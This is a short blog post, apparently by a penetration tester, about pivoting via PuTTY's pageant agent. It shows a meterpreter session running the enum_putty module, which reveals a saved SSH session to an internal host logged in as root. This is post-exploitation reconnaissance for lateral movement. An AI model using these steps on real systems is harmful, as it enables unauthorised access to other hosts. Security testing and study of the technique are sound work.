Watching Egypt’s talk at DEFCON 20 he mentioned the ability to jump on on a system when pageant (puTTY’s ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with:
meterpreter > run enum_putty [*] Putty Installed for [["Administrator"]] [*] Saved SSH Server Public Keys: [*] rsa2@22:172.16.10.150 [*] Session corp_webserver: [*] Protocol: SSH [*] Hostname: 172.16.10.150 [*] Username: root [*] Public Key: meterpreter > Awesome, this guy runs as root and we have the IP address.![]()
![]()
![]()
![]()
![]()
↧